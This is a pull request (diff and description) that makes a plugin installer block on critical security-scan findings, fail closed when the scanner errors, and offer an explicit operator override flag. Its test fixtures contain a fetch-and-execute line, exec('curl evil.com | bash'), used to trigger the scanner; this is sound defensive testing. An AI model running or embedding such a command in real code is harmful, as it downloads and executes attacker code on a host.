### PR TITLE
fix(plugins): block plugin install on critical scan findings, fail closed on scan error

### DIFF
--- a/src/cli/plugins-cli.ts
+++ b/src/cli/plugins-cli.ts
@@ -198,7 +198,7 @@ async function installBundledPluginSource(params: {
 
 async function runPluginInstallCommand(params: {
   raw: string;
-  opts: { link?: boolean; pin?: boolean };
+  opts: { link?: boolean; pin?: boolean; dangerouslyForceUnsafeInstall?: boolean };
 }) {
   const { raw, opts } = params;
   const fileSpec = resolveFileNpmSpecToLocalPath(raw);
@@ -214,7 +214,11 @@ async function runPluginInstallCommand(params: {
     if (opts.link) {
       const existing = cfg.plugins?.load?.paths ?? [];
       const merged = Array.from(new Set([...existing, resolved]));
-      const probe = await installPluginFromPath({ path: resolved, dryRun: true });
+      const probe = await installPluginFromPath({
+        path: resolved,
+        dryRun: true,
+        dangerouslyForceUnsafeInstall: opts.dangerouslyForceUnsafeInstall,
+      });
       if (!probe.ok) {
         defaultRuntime.error(probe.error);
         process.exit(1);
@@ -252,6 +256,7 @@ async function runPluginInstallCommand(params: {
     const result = await installPluginFromPath({
       path: resolved,
       logger: createPluginInstallLogger(),
+      dangerouslyForceUnsafeInstall: opts.dangerouslyForceUnsafeInstall,
     });
     if (!result.ok) {
       defaultRuntime.error(result.error);
@@ -317,6 +322,7 @@ async function runPluginInstallCommand(params: {
   const result = await installPluginFromNpmSpec({
     spec: raw,
     logger: createPluginInstallLogger(),
+    dangerouslyForceUnsafeInstall: opts.dangerouslyForceUnsafeInstall,
   });
   if (!result.ok) {
     const bundledFallbackPlan = resolveBundledInstallPlanForNpmFailure({
@@ -716,9 +722,19 @@ export function registerPluginsCli(program: Command) {
     .argument("<path-or-spec>", "Path (.ts/.js/.zip/.tgz/.tar.gz) or an npm package spec")
     .option("-l, --link", "Link a local path instead of copying", false)
     .option("--pin", "Record npm installs as exact resolved <name>@<version>", false)
-    .action(async (raw: string, opts: { link?: boolean; pin?: boolean }) => {
-      await runPluginInstallCommand({ raw, opts });
-    });
+    .option(
+      "--dangerously-force-unsafe-install",
+      "Install even if the code safety scan reports critical findings or fails",
+      false,
+    )
+    .action(
+      async (
+        raw: string,
+        opts: { link?: boolean; pin?: boolean; dangerouslyForceUnsafeInstall?: boolean },
+      ) => {
+        await runPluginInstallCommand({ raw, opts });
+      },
+    );
 
   plugins
     .command("update")

--- a/src/plugins/install.test.ts
+++ b/src/plugins/install.test.ts
@@ -201,11 +201,16 @@ function setupInstallPluginFromDirFixture(params?: { devDependencies?: Record<st
   return { pluginDir, extensionsDir: path.join(stateDir, "extensions") };
 }
 
-async function installFromDirWithWarnings(params: { pluginDir: string; extensionsDir: string }) {
+async function installFromDirWithWarnings(params: {
+  pluginDir: string;
+  extensionsDir: string;
+  dangerouslyForceUnsafeInstall?: boolean;
+}) {
   const warnings: string[] = [];
   const result = await installPluginFromDir({
     dirPath: params.pluginDir,
     extensionsDir: params.extensionsDir,
+    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     logger: {
       info: () => {},
       warn: (msg: string) => warnings.push(msg),
@@ -545,7 +550,7 @@ describe("installPluginFromArchive", () => {
     expect.unreachable("expected install to fail without remoteclaw.extensions");
   });
 
-  it("warns when plugin contains dangerous code patterns", async () => {
+  it("blocks install when plugin contains dangerous code patterns", async () => {
     const { pluginDir, extensionsDir } = setupPluginInstallDirs();
 
     fs.writeFileSync(
@@ -563,8 +568,42 @@ describe("installPluginFromArchive", () => {
 
     const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
 
+    expect(result.ok).toBe(false);
+    if (result.ok) {
+      return;
+    }
+    expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED);
+    expect(result.error).toContain("dangerous code patterns");
+    expect(warnings.some((w) => w.includes("dangerous code pattern"))).toBe(true);
+    // The plugin must not have been copied into the extensions directory.
+    expect(fs.existsSync(path.join(extensionsDir, "dangerous-plugin"))).toBe(false);
+  });
+
+  it("installs dangerous plugin when dangerouslyForceUnsafeInstall is set", async () => {
+    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
+
+    fs.writeFileSync(
+      path.join(pluginDir, "package.json"),
+      JSON.stringify({
+        name: "dangerous-plugin",
+        version: "1.0.0",
+        remoteclaw: { extensions: ["index.js"] },
+      }),
+    );
+    fs.writeFileSync(
+      path.join(pluginDir, "index.js"),
+      `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
+    );
+
+    const { result, warnings } = await installFromDirWithWarnings({
+      pluginDir,
+      extensionsDir,
+      dangerouslyForceUnsafeInstall: true,
+    });
+
     expect(result.ok).toBe(true);
     expect(warnings.some((w) => w.includes("dangerous code pattern"))).toBe(true);
+    expect(warnings.some((w) => w.includes("--dangerously-force-unsafe-install"))).toBe(true);
   });
 
   it("scans extension entry files in hidden directories", async () => {
@@ -584,14 +623,21 @@ describe("installPluginFromArchive", () => {
       `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
     );
 
-    const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
+    // Force the install through so we can assert the hidden entry WAS scanned
+    // (both the hidden-path notice and the dangerous-pattern finding fire);
+    // the block behavior itself is covered by the dedicated tests above.
+    const { result, warnings } = await installFromDirWithWarnings({
+      pluginDir,
+      extensionsDir,
+      dangerouslyForceUnsafeInstall: true,
+    });
 
     expect(result.ok).toBe(true);
     expect(warnings.some((w) => w.includes("hidden/node_modules path"))).toBe(true);
     expect(warnings.some((w) => w.includes("dangerous code pattern"))).toBe(true);
   });
 
-  it("continues install when scanner throws", async () => {
+  it("blocks install when scanner throws (fail-closed)", async () => {
     const scanSpy = vi
       .spyOn(skillScanner, "scanDirectoryWithSummary")
       .mockRejectedValueOnce(new Error("scanner exploded"));
@@ -608,7 +654,40 @@ describe("installPluginFromArchive", () => {
     );
     fs.writeFileSync(path.join(pluginDir, "index.js"), "export {};");
 
-    const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
+    const { result } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
+
+    expect(result.ok).toBe(false);
+    if (result.ok) {
+      return;
+    }
+    expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_FAILED);
+    expect(result.error).toContain("code safety scan failed");
+    expect(fs.existsSync(path.join(extensionsDir, "scan-fail-plugin"))).toBe(false);
+    scanSpy.mockRestore();
+  });
+
+  it("installs when scanner throws with dangerouslyForceUnsafeInstall", async () => {
+    const scanSpy = vi
+      .spyOn(skillScanner, "scanDirectoryWithSummary")
+      .mockRejectedValueOnce(new Error("scanner exploded"));
+
+    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
+
+    fs.writeFileSync(
+      path.join(pluginDir, "package.json"),
+      JSON.stringify({
+        name: "scan-fail-plugin",
+        version: "1.0.0",
+        remoteclaw: { extensions: ["index.js"] },
+      }),
+    );
+    fs.writeFileSync(path.join(pluginDir, "index.js"), "export {};");
+
+    const { result, warnings } = await installFromDirWithWarnings({
+      pluginDir,
+      extensionsDir,
+      dangerouslyForceUnsafeInstall: true,
+    });
 
     expect(result.ok).toBe(true);
     expect(warnings.some((w) => w.includes("code safety scan failed"))).toBe(true);

--- a/src/plugins/install.ts
+++ b/src/plugins/install.ts
@@ -30,6 +30,7 @@ import { validateRegistryNpmSpec } from "../infra/npm-registry-spec.js";
 import { extensionUsesSkippedScannerPath, isPathInside } from "../security/scan-paths.js";
 import * as skillScanner from "../security/skill-scanner.js";
 import { CONFIG_DIR, resolveUserPath } from "../utils.js";
+import type { InstallSafetyOverrides } from "./install-security-scan.types.js";
 import {
   loadPluginManifest,
   resolvePackageExtensionEntries,
@@ -54,6 +55,8 @@ export const PLUGIN_INSTALL_ERROR_CODE = {
   EMPTY_REMOTECLAW_EXTENSIONS: "empty_remoteclaw_extensions",
   NPM_PACKAGE_NOT_FOUND: "npm_package_not_found",
   PLUGIN_ID_MISMATCH: "plugin_id_mismatch",
+  SECURITY_SCAN_BLOCKED: "security_scan_blocked",
+  SECURITY_SCAN_FAILED: "security_scan_failed",
 } as const;
 
 export type PluginInstallErrorCode =
@@ -147,7 +150,7 @@ function buildFileInstallResult(pluginId: string, targetFile: string): InstallPl
   };
 }
 
-type PackageInstallCommonParams = {
+type PackageInstallCommonParams = InstallSafetyOverrides & {
   extensionsDir?: string;
   timeoutMs?: number;
   logger?: PluginInstallLogger;
@@ -165,6 +168,7 @@ function pickPackageInstallCommonParams(
   params: PackageInstallCommonParams,
 ): PackageInstallCommonParams {
   return {
+    dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
     extensionsDir: params.extensionsDir,
     timeoutMs: params.timeoutMs,
     logger: params.logger,
@@ -281,7 +285,12 @@ async function installPluginFromPackageDir(
     forcedScanEntries.push(resolvedEntry);
   }
 
-  // Scan plugin source for dangerous code patterns (warn-only; never blocks install)
+  // Scan plugin source for dangerous code patterns. Installed plugins run
+  // in-process with full host capability (no sandbox), so critical findings
+  // BLOCK the install and a scanner error fails CLOSED — both unless the
+  // operator has explicitly opted into an unsafe install after reviewing the
+  // findings via dangerouslyForceUnsafeInstall.
+  const forceUnsafeInstall = params.dangerouslyForceUnsafeInstall === true;
   try {
     const scanSummary = await skillScanner.scanDirectoryWithSummary(params.packageDir, {
       includeFiles: forcedScanEntries,
@@ -294,14 +303,31 @@ async function installPluginFromPackageDir(
       logger.warn?.(
         `WARNING: Plugin "${pluginId}" contains dangerous code patterns: ${criticalDetails}`,
       );
+      if (!forceUnsafeInstall) {
+        return {
+          ok: false,
+          error: `Plugin "${pluginId}" installation blocked: dangerous code patterns detected: ${criticalDetails}. Review the findings and re-run with --dangerously-force-unsafe-install to override.`,
+          code: PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED,
+        };
+      }
+      logger.warn?.(
+        `Proceeding with install of "${pluginId}" despite critical findings because --dangerously-force-unsafe-install was set.`,
+      );
     } else if (scanSummary.warn > 0) {
       logger.warn?.(
         `Plugin "${pluginId}" has ${scanSummary.warn} suspicious code pattern(s). Run "remoteclaw security audit --deep" for details.`,
       );
     }
   } catch (err) {
+    if (!forceUnsafeInstall) {
+      return {
+        ok: false,
+        error: `Plugin "${pluginId}" installation blocked: code safety scan failed (${String(err)}). Run "remoteclaw security audit --deep" for details, or re-run with --dangerously-force-unsafe-install to override.`,
+        code: PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_FAILED,
+      };
+    }
     logger.warn?.(
-      `Plugin "${pluginId}" code safety scan failed (${String(err)}). Installation continues; run "remoteclaw security audit --deep" after install.`,
+      `Plugin "${pluginId}" code safety scan failed (${String(err)}). Proceeding because --dangerously-force-unsafe-install was set.`,
     );
   }
 
@@ -399,6 +425,7 @@ export async function installPluginFromArchive(
       await installPluginFromPackageDir({
         packageDir,
         ...pickPackageInstallCommonParams({
+          dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
           extensionsDir: params.extensionsDir,
           timeoutMs,
           logger,
@@ -493,6 +520,7 @@ export async function installPluginFromNpmSpec(params: {
   dryRun?: boolean;
   expectedPluginId?: string;
   expectedIntegrity?: string;
+  dangerouslyForceUnsafeInstall?: boolean;
   onIntegrityDrift?: (params: PluginNpmIntegrityDriftParams) => boolean | Promise<boolean>;
 }): Promise<InstallPluginResult> {
   const { logger, timeoutMs, mode, dryRun } = resolveTimedInstallModeOptions(params, defaultLogger);
@@ -519,6 +547,7 @@ export async function installPluginFromNpmSpec(params: {
     },
     installFromArchive: installPluginFromArchive,
     archiveInstallParams: {
+      dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
       extensionsDir: params.extensionsDir,
       timeoutMs,
       logger,


### PR DESCRIPTION
## Summary

The install-time dangerous-code scan in `src/plugins/install.ts` was advisory only. When the scanner reported **critical** findings it logged a warning and installed the plugin anyway, and when the scanner **threw** the error was swallowed and the install continued. Installed plugins execute in-process with full host capability (loaded via `jiti`, no sandbox), so a malicious or compromised plugin runs with the operator's privileges. A fail-open scan and a crash-to-bypass path are unacceptable given that blast radius.

This PR makes the scan enforcing while preserving a deliberate operator escape hatch.

## Changes

- **Block on critical findings.** A scan summary with `critical > 0` now aborts the install and returns a dedicated `security_scan_blocked` error code. The critical finding details (message + `file:line`) are included in the error message so the operator can review them.
- **Fail closed on scanner error.** If the scan throws, the install now aborts with a `security_scan_failed` error code instead of silently proceeding.
- **Explicit operator override.** Both behaviors are gated by a new `--dangerously-force-unsafe-install` flag on `plugins install`, wired through the existing `InstallSafetyOverrides` shape (`dangerouslyForceUnsafeInstall`). With the flag set, a critical finding or a scan error logs a clear "proceeding despite" warning and continues. This exists because some legitimate plugins (e.g. provider-CLI or API-key integrations) trip the `dangerous-exec` / `env-harvesting` rules by design, and an operator who has reviewed the findings must still be able to install them.

The pre-existing warning log for critical findings, and the informational log for lower-severity (`warn`) findings, are unchanged.

### Entry points

The override threads through every install path that runs the scan: directory install, archive install, npm-spec install, and the `--link` path (including its dry-run probe, since the scan runs before the dry-run early return). Single-file install is not scanned and is intentionally left untouched.

## Behavior

| Scenario | Before | After (no flag) | After (`--dangerously-force-unsafe-install`) |
|----------|--------|-----------------|----------------------------------------------|
| Critical findings | warn + install | **blocked** (`security_scan_blocked`) | warn + install |
| Scanner throws | swallowed + install | **blocked** (`security_scan_failed`) | warn + install |
| Only `warn`-level findings | info log + install | info log + install | info log + install |
| Clean scan | install | install | install |

A blocked plugin is never copied into the extensions directory — the abort returns before the copy step.

## Testing

`src/plugins/install.test.ts` updated:

- Flipped the two tests that asserted the fail-open behavior ("warns and installs on dangerous patterns" → **blocks**; "continues when scanner throws" → **blocks, fail-closed**), each now asserting the correct error code and that the plugin is not copied.
- Added override-bypass coverage for both the critical-findings path and the scanner-error path (asserts install succeeds and the "proceeding despite" warning fires).

`pnpm check` (format + typecheck + lint + repo custom lints) passes. The plugin `install.test.ts` suite and the sibling update/marketplace/CLI suites are green.

Closes #2832

🤖 Generated with [Claude Code](https://claude.com/claude-code)
